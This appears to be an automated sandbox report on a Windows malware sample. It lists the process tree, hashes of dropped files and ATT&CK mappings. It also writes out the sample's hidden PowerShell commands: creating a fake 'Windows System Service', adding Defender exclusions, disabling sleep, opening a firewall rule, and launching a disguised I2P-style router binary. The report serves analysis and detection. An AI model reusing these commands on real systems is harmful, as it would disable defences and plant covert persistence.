PID 2536 wrote to memory of 4728	2536	setup.exe	winsvc.exe
PID 2536 wrote to memory of 4728	2536	setup.exe	winsvc.exe
PID 4728 wrote to memory of 680	4728	winsvc.exe	powershell.exe
PID 4728 wrote to memory of 680	4728	winsvc.exe	powershell.exe
PID 680 wrote to memory of 4004	680	powershell.exe	sc.exe
PID 680 wrote to memory of 4004	680	powershell.exe	sc.exe
PID 4728 wrote to memory of 4380	4728	winsvc.exe	powershell.exe
PID 4728 wrote to memory of 4380	4728	winsvc.exe	powershell.exe
PID 4380 wrote to memory of 2592	4380	powershell.exe	sc.exe
PID 4380 wrote to memory of 2592	4380	powershell.exe	sc.exe
PID 4728 wrote to memory of 4356	4728	winsvc.exe	powershell.exe
PID 4728 wrote to memory of 4356	4728	winsvc.exe	powershell.exe
PID 4356 wrote to memory of 4656	4356	powershell.exe	sc.exe
PID 4356 wrote to memory of 4656	4356	powershell.exe	sc.exe
PID 4728 wrote to memory of 3588	4728	winsvc.exe	powershell.exe
PID 4728 wrote to memory of 3588	4728	winsvc.exe	powershell.exe
PID 3588 wrote to memory of 4904	3588	powershell.exe	sc.exe
PID 3588 wrote to memory of 4904	3588	powershell.exe	sc.exe
PID 2364 wrote to memory of 652	2364	winsvc.exe	powershell.exe
PID 2364 wrote to memory of 652	2364	winsvc.exe	powershell.exe
PID 2364 wrote to memory of 4668	2364	winsvc.exe	powershell.exe
PID 2364 wrote to memory of 4668	2364	winsvc.exe	powershell.exe
PID 2364 wrote to memory of 2792	2364	winsvc.exe	powershell.exe
PID 2364 wrote to memory of 2792	2364	winsvc.exe	powershell.exe
PID 2792 wrote to memory of 4196	2792	powershell.exe	powercfg.exe
PID 2792 wrote to memory of 4196	2792	powershell.exe	powercfg.exe
PID 2364 wrote to memory of 4848	2364	winsvc.exe	powershell.exe
PID 2364 wrote to memory of 4848	2364	winsvc.exe	powershell.exe
PID 4848 wrote to memory of 708	4848	powershell.exe	powercfg.exe
PID 4848 wrote to memory of 708	4848	powershell.exe	powercfg.exe
PID 2364 wrote to memory of 1756	2364	winsvc.exe	powershell.exe
PID 2364 wrote to memory of 1756	2364	winsvc.exe	powershell.exe
PID 1756 wrote to memory of 1236	1756	powershell.exe	powercfg.exe
PID 1756 wrote to memory of 1236	1756	powershell.exe	powercfg.exe
PID 2364 wrote to memory of 2684	2364	winsvc.exe	powershell.exe
PID 2364 wrote to memory of 2684	2364	winsvc.exe	powershell.exe
PID 2684 wrote to memory of 164	2684	powershell.exe	powercfg.exe
PID 2684 wrote to memory of 164	2684	powershell.exe	powercfg.exe
PID 2364 wrote to memory of 4116	2364	winsvc.exe	powershell.exe
PID 2364 wrote to memory of 4116	2364	winsvc.exe	powershell.exe
PID 4116 wrote to memory of 4284	4116	powershell.exe	powercfg.exe
PID 4116 wrote to memory of 4284	4116	powershell.exe	powercfg.exe
PID 2364 wrote to memory of 1668	2364	winsvc.exe	taskkill.exe
PID 2364 wrote to memory of 1668	2364	winsvc.exe	taskkill.exe
PID 2364 wrote to memory of 2392	2364	winsvc.exe	taskkill.exe
PID 2364 wrote to memory of 2392	2364	winsvc.exe	taskkill.exe
PID 2364 wrote to memory of 3860	2364	winsvc.exe	taskkill.exe
PID 2364 wrote to memory of 3860	2364	winsvc.exe	taskkill.exe
PID 2364 wrote to memory of 2224	2364	winsvc.exe	taskkill.exe
PID 2364 wrote to memory of 2224	2364	winsvc.exe	taskkill.exe
PID 2364 wrote to memory of 2376	2364	winsvc.exe	powershell.exe
PID 2364 wrote to memory of 2376	2364	winsvc.exe	powershell.exe
PID 2364 wrote to memory of 3512	2364	winsvc.exe	powershell.exe
PID 2364 wrote to memory of 3512	2364	winsvc.exe	powershell.exe
PID 2364 wrote to memory of 512	2364	winsvc.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\1c733ad7ed4f89826d675196abcc3a6133bb8f67c69d56e5fcb601ad521ff9f8.exe
"C:\Users\Admin\AppData\Local\Temp\1c733ad7ed4f89826d675196abcc3a6133bb8f67c69d56e5fcb601ad521ff9f8.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4656
- C:\Users\Admin\AppData\Local\Temp\da_protected.exe
  "C:\Users\Admin\AppData\Local\Temp\da_protected.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3188
- - C:\Users\Admin\AppData\Local\Temp\dbosqb.exe
    "C:\Users\Admin\AppData\Local\Temp\dbosqb.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1624
  - - C:\Users\Admin\AppData\Local\Temp\setup.exe
      setup.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4300
    - - C:\Users\Admin\AppData\Local\Temp\setup-8d6e335226ec2787\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup-8d6e335226ec2787\setup.exe"
        5⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:2536
      - C:\Windows\system32\winsvc.exe
        
        "C:\Windows\system32\winsvc.exe" "C:\Users\Admin\AppData\Local\Temp\setup-8d6e335226ec2787\setup.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "create" "winsvc" "type=own" "start=auto" "error=ignore" "binPath=\"C:\Windows\system32\winsvc.exe\"" "DisplayName=\"Windows System Service\""
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:680
        
        C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" create winsvc type=own start=auto error=ignore binPath=C:\Windows\system32\winsvc.exe "DisplayName=Windows System Service"
        8⤵
        Launches sc.exe
        
        PID:4004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "failure" "winsvc" "reset=0" "actions=restart/0/restart/0/restart/0"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4380
        
        C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" failure winsvc reset=0 actions=restart/0/restart/0/restart/0
        8⤵
        Launches sc.exe
        
        PID:2592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "description" "winsvc" "\"Windows System Service is the main system supervision service.\""
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4356
        
        C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" description winsvc "Windows System Service is the main system supervision service."
        8⤵
        Launches sc.exe
        
        PID:4656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "start" "winsvc"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3588
        
        C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" start winsvc
        8⤵
        Launches sc.exe
        
        PID:4904
  - - C:\Users\Admin\AppData\Local\Temp\setup.exe
      setup.exe
      4⤵
      Executes dropped EXE
      PID:1492
    - - C:\Users\Admin\AppData\Local\Temp\setup-f6b51b073af3511a\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup-f6b51b073af3511a\setup.exe"
        5⤵
        Executes dropped EXE
        
        PID:3860
  - - C:\Users\Admin\AppData\Local\Temp\setup.exe
      setup.exe
      4⤵
      Executes dropped EXE
      PID:3300
    - - C:\Users\Admin\AppData\Local\Temp\setup-1adecc4bf285d24f\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup-1adecc4bf285d24f\setup.exe"
        5⤵
        Executes dropped EXE
        
        PID:2368

C:\Windows\system32\winsvc.exe
C:\Windows\system32\winsvc.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2364
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\system32\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\Temp\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-SETACTIVE" "8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2792
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -SETACTIVE 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4196
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-ac" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4848
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -change standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-dc" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1756
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -change standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1236
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-ac" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2684
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -change hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-dc" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4116
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -change hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4284
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "winnet.exe"
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1668
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "winnet.exe"
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2392
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "wincfg.exe"
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3860
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "wincfg.exe"
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2224
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Remove-NetFirewallRule" "-DisplayName" "\"Windows Network Manager\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "New-NetFirewallRule" "-DisplayName" "\"Windows Network Manager\"" "-Program" "\"C:\Windows\system32\winnet.exe\"" "-Action" "Allow" "-Direction" "Inbound" "-EdgeTraversalPolicy" "Allow" "-Enabled" "True"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3512
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "WINNET.exe"
  2⤵
  - Kills process with taskkill
  PID:512
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "WINNET.exe"
  2⤵
  - Kills process with taskkill
  PID:4940
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "WINCFG.exe"
  2⤵
  - Kills process with taskkill
  PID:2804
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "WINCFG.exe"
  2⤵
  - Kills process with taskkill
  PID:2760
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "WINNET.exe"
  2⤵
  - Kills process with taskkill
  PID:4828
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "WINCFG.exe"
  2⤵
  - Kills process with taskkill
  PID:1516
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "WINNET.exe"
  2⤵
  - Kills process with taskkill
  PID:4628
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "WINCFG.exe"
  2⤵
  - Kills process with taskkill
  PID:4636
- C:\WINDOWS\SYSTEM32\WINNET.EXE
  "C:\WINDOWS\SYSTEM32\WINNET.EXE" "--datadir=C:\Windows\system32\data" "--precomputation.elgamal=false" "--persist.profiles=false" "--persist.addressbook=false" "--cpuext.aesni" "--cpuext.avx" "--ipv4" "--ipv6" "--bandwidth=X" "--share=100" "--floodfill" "--nat" "--upnp.enabled=true" "--upnp.name=Microsoft" "--insomnia" "--nettime.enabled=true" "--nettime.ntpsyncinterval=1" "--sam.enabled=true" "--sam.singlethread=false" "--http.enabled=false" "--bob.enabled=false" "--httpproxy.enabled=false" "--socksproxy.enabled=false" "--i2cp.enabled=false" "--i2pcontrol.enabled=false" "--loglevel=none" "--log=stdout"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:1952
- C:\WINDOWS\SYSTEM32\WINCFG.EXE
  "C:\WINDOWS\SYSTEM32\WINCFG.EXE"
  2⤵
  - Executes dropped EXE
  PID:4948

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3cb86ee80b27e2280a2b043011b71c9d

SHA1
e386db217ea6ea8b801f60c01ca57b4ec7363b6f

SHA256
c7ca20811f29e64fdaa876649684b58c1eefb492abf641c833cf07c81851a9a6

SHA512
390a9b95533d1a933c3bc19cd97ba550bad9cbb8fd0d9e24c904260703a7f6371c91471ba5a70eb57e477f6d49cec316d056cef6c7fed9f6954a2c70bb65120a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dd21795b21f5ccac4e2c29e727a939d4

SHA1
e999e2e6481cac7a11223d08de114910469755f6

SHA256
dfdd88bd75b46b0c0108977badf081b4fcd9a36ca12675fc880d82b60d7f5e0a

SHA512
3109ee2c67ffaea3cf5ff7a4e5871011d3a7c0da48b808f37dee53bba5b8739c6610b12126bb5f0faa465fe449de3faf83fa296ac28bde0ec83619332e17d764

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8bc113f6d4b6b284ff298810b84f6e9b

SHA1
dab9e577e17049463c97caa8eddebef7ad733753

SHA256
a0bf69d738ea9d94f28398d7a76f4db2a88c0ef59cb16b341d3492492c3f6c6d

SHA512
d9ab2a6db40a202e0071bdf3a1bbb65b0a378628a06129c0832c32b9f160cb6be839b3ca24620da4c067454e8adf06346b72fbbbe04da5317878721592230b1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b323a0fa17ecfaf144d1cee7ce40f759

SHA1
ff6bf3623e2cbacb74a0f4ceefa26499152562ba

SHA256
56ab965e5832ea6c8866b0dad787ad576ecfe7f29a3322485ec873ec260319ce

SHA512
03839934b9ed905c5e2a5eaef46503c1ed2d45feef8c246fdcc081ebc1afd6865bcc0ee75b1fb2fcd00ee1333999a7b9573d9d0b68b5616edc0d359c76345011

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_daikhp5s.beo.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\da_protected.exe

Filesize
3.2MB

MD5
3d21c714fbb98a6a3c72919928c9525c

SHA1
bf628293920b8f0418de008acc8f3506eaeff3cb

SHA256
811be420db2f390e60a291018126a8aa45c8c5182c050b13076c80d3f80d153c

SHA512
3b21fda899cf197a740dd4f2844c99c772a16ffe20581fe78e801c193f29714fbfa23843059ee34baf6176e71434f0ed7506d75de91b87348bcf9cc4b999575a

Download Submit
C:\Users\Admin\AppData\Local\Temp\dbosqb.exe

Filesize
130KB

MD5
4a4ee1cd7bfff65126a6def9b3598b6b

SHA1
42314488735e4b4f846d6c80d749ac72687898aa

SHA256
888c660ede9830e9a08aeac4bf622590e5791db19037eabb67a3acea2ec3ebe4

SHA512
dbef4cd72a4a34f4adf0ea61fa817b234cdb9dda090642909003b99c26a586bcb18c9174e337c826e5aa9281874039c8c8e7f39cc8cf6729f10181054394221f

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup-1adecc4bf285d24f\setup.exe

Filesize
428KB

MD5
5524821eae30dc08852781fc4f88d7a7

SHA1
5612467d1c2b92107f229e53b654b555cd504d04

SHA256
13eb346c13bdfefb68b20ecc627a04c72a88c0422ef3f1ea1d3fe29fab6afa93

SHA512
0dc2a5bbb1778bd026d8f3913b81a08dd5b4eb603fff921417845b4e430e0de428d0deacd8481f5f3e7a7422ba7330a9ed29c5508b2d1dd592793567a2121f36

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup-8d6e335226ec2787\setup.exe

Filesize
41.4MB

MD5
e0180e8704b79a8c2132a48fa956e765

SHA1
6690b172ea1efec4f17abb5cfa1a8b2020c8df26

SHA256
9f2adceadca58edbf46b3f2301c0351ee38f369a06ddf140b3ed1079fabdcd33

SHA512
30306356fa075d9597a2bebf1bc14f16c417b4550ca8ee44183151b9b741972e5c275deaebd382064adcef429c23e24657b6a45317122f2b95abc110b06605d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe

Filesize
14.7MB

MD5
3708b9f0eab4da467a116a456a287428

SHA1
c41580fc6fb1a832eb6aabb5ef782d42cd78c64e

SHA256
92ba2e43cc43870ba03923152a3ad6972df11d60ca601b42c7584ccdbe7e9f70

SHA512
00c3de7cb6c083882534cadcf0c5e93d3475504d5176592609ddee04eb515c12ea6363d47d0545570938e857dfc67d1636f038129609804b29f41749bc41f287

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe

Filesize
34.4MB

MD5
f9ca0843558c95c441aa9b2f00ed57a6

SHA1
a71486409c55062fe65ff5f2a6cfc52cf0c45027

SHA256
7095c024a647f825dd9899e2447a73a586d08d5c0bd1001eb2aec86d6cf12183

SHA512
696f1557d4bcd7de7fa0bc3f579d55ca6dd4897927cd517290cc89d1f4ef24270202970757a93af5754a6e7b55f89776a65fdc08f8f1cbaa845730c61ebf39c4

Download Submit
C:\WINDOWS\SYSTEM32\WINCFG.EXE

Filesize
34.1MB

MD5
4ef95357e1e62a084778d5da742a969c

SHA1
cc67071998766a027b5025b541d16045a8ed6864

SHA256
47e394490c23166f682434bfaae3b423c7ed143041a4ce610246baa3aa761eee

SHA512
513a4f80882715bb337dceae996f87e72466dd6bb55a1ab2cc60d5fd288a685810d9e5ebdb146838ccdc8c3ab36591fea901105af10458c79cd1a2692c6f0ec4

Download Submit
C:\Windows\System32\data\router.info

Filesize
931B

MD5
43c0dc2a102f27905707a9bde252edfe

SHA1
c95d7670dbe8d118ffaa3c77d5ff657a33c06fb4

SHA256
75d2e978423164fac5b276735a6ab9d613ead0f3890d3657fd730dfe39673e05

SHA512
3809ee33cb46b516c593a91201d02e7cf8c85ff069fbff22a7ed4adb8ffe03c3a6615bbd03029ce73b73da0b2680b583865bab2042db0a2a582cdeb1840a08bc

Download Submit
C:\Windows\System32\winnet.exe

Filesize
9.1MB

MD5
2fdbf4ba6ab24cf44aa0cc08cd77ca66

SHA1
df5e034ba45a932b9f5d3ed7adc4a71e0b376984

SHA256
fcd362e0632b35dad13a87f09ea6da4d07fa89516f42d64236d2cc3e3b2b725b

SHA512
81d73f7540ede7337922dc18fc6b110c87f621bc0349c3fa17f50d1cb924b0d9b30a4a772b2d548238b65a1be43d458f1991320e7308e608c6cf40ccc3e59a51

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
c2d12189fe761c06e01839b1f6726332

SHA1
fc9632b32d17d489580ac22968cd5d7f7d96ded1

SHA256
6b592cb255b42ec8a77467d3f0be5e9b2f15f1c72bc1cc8cbe44ae2891765aee

SHA512
828fc907f67bbceb51c3eefb06b0a744aeba36afd9aaf0a663168fbb10caf8325d98d6c8f2a07eb1da22a6d7439e56a454560fc1ef7b624b57e3b80adbb89242

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8eb24dbb0dd8780741e9a291996e9c9e

SHA1
5cdcc5b8aeb384977abe99c5d20bff64356707b5

SHA256
51f3420c13c267e315fd5b760752b57aeba1c8382c622d9d98b43add92fcde86

SHA512
735c0445446c955f64be96b6ae2d3f811b1a319fc3ca12a97f9a3dfb459a234055449b60d55f8c8d70e7e18fed63e9229b9e29966e2ee12b0f89ce60e631a6d4

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a367fdf3d04516ca09622707c62cce14

SHA1
9a4351d29eb769badcc0a7920bed81b7e546409f

SHA256
e448946d09acf8441a4b49ef27aecec56a0e74264f141ca88b6b56f4d937464a

SHA512
b93d48406221a304dcbb173941397a89631aeefae1eecb4c8a3aeea928426175e829291b44b2f4c46cb73641cc13cead8aa789ff8d8d6b106b7cfec5b2f4f805

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
abf70a1aedcae15ce34222c127abd80f

SHA1
996e98a805a266584ed741864f774ac6ec9d5247

SHA256
9249a10506784af34ce6899c5d4586c566b3c16c0e091c5198375c91abcfe4a4

SHA512
083393fed693a2dcbe2e916c1a58a5d8aad9adf4834b64f010a488df318f077d21e9455ced85880a544e496afdf9722e0997f1689b560f0bea56b807ae1a5883

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ac4826367cb2f547addee3a444193fe0

SHA1
b901e1af71ce61526bb5983b427b4daf85ee9b30

SHA256
7bb2decc867f2f7420be30ce6ab36ea35583730e6f27e9c7a8050bfe1c7dab10

SHA512
66d3cc0160b719f3c921378e4ee4881053f72a7197f7580ec43d0ba56880517ae4fface979e981a8190a633d45414cd2884e3be28af1fefa4512ad04a171b2eb

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dc8c4b1da69ed75b86ad520c0df51000

SHA1
aabfda1cd232d6a1f68515948702b1bd659847f0

SHA256
dc81e36dd351afe4006a8ba7b423c751c5ad4a11e5c1b4da1692b3b781e3897c

SHA512
6b4a6e7472371edcf4ad2291ca7628740afde5b50c7328a6927fe9adb2923c51bb07eb812a2970aa4803f33b86d5590b0daea8f0504ea1b028152e5c078978c0

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
36326ce028e0098a30ff1e1d63875532

SHA1
82ac1f7bc341d0efc05025711431c310bb95f323

SHA256
dec985a702f5913892950cf49f863fa902a197e3b061a56a94e9185e98209f49

SHA512
fda11d2b672e0e26a0194722aee1a3c7e92424929b706ce1f6faa2db4eac29e066c7f1fa7cd8a22af8d7ab61d8b503e4045d782f28496ae16916fbb90527f32c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9816d42dbc791df84f2058472cb0544d

SHA1
b4dcd9db4bcd2801b88cfbb7276a043018646da7

SHA256
67bb43a6196f2071d3001f62c139375be3910ce98cd93f540bfb444a561d08d5

SHA512
0e740e254b682657374744f0617089530d555fb295138b5b74057a2ed99fe1df826eb7bdff254347959bb7d4f518d2f34808a9523ee3d72c9153e77cc4167b26

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1a212e5e1bab668aaa5e2cf7074ed239

SHA1
859e52ce225e236ea1d0c93634b33c5452c10c19

SHA256
365351ff7a5cde2ae429a34464aef2c1368b19d885e9d49c11ae1d6f84f873b2

SHA512
056a55d02a33c99d26c43641022095c17eccde433b4e0447bd44b5ff1428155d4528add55f4d56af3280d31ce098be4aa726cb092f1d55ca8a814d33f54c5b0d

Download Submit
memory/652-243-0x000001BD54710000-0x000001BD5471A000-memory.dmp

Filesize
40KB

Download
memory/652-210-0x000001BD6CA20000-0x000001BD6CAD9000-memory.dmp

Filesize
740KB

Download
memory/652-204-0x000001BD54720000-0x000001BD5473C000-memory.dmp

Filesize
112KB

Download
memory/680-91-0x00000203A4D20000-0x00000203A4D96000-memory.dmp

Filesize
472KB

Download
memory/680-88-0x00000203A4AE0000-0x00000203A4B02000-memory.dmp

Filesize
136KB

Download
memory/1624-61-0x00007FF79F2C0000-0x00007FF79F2E3000-memory.dmp

Filesize
140KB

Download
memory/1952-1352-0x00007FF6DBE70000-0x00007FF6DC79C000-memory.dmp

Filesize
9.2MB

Download
memory/1952-1476-0x00007FF6DBE70000-0x00007FF6DC79C000-memory.dmp

Filesize
9.2MB

Download
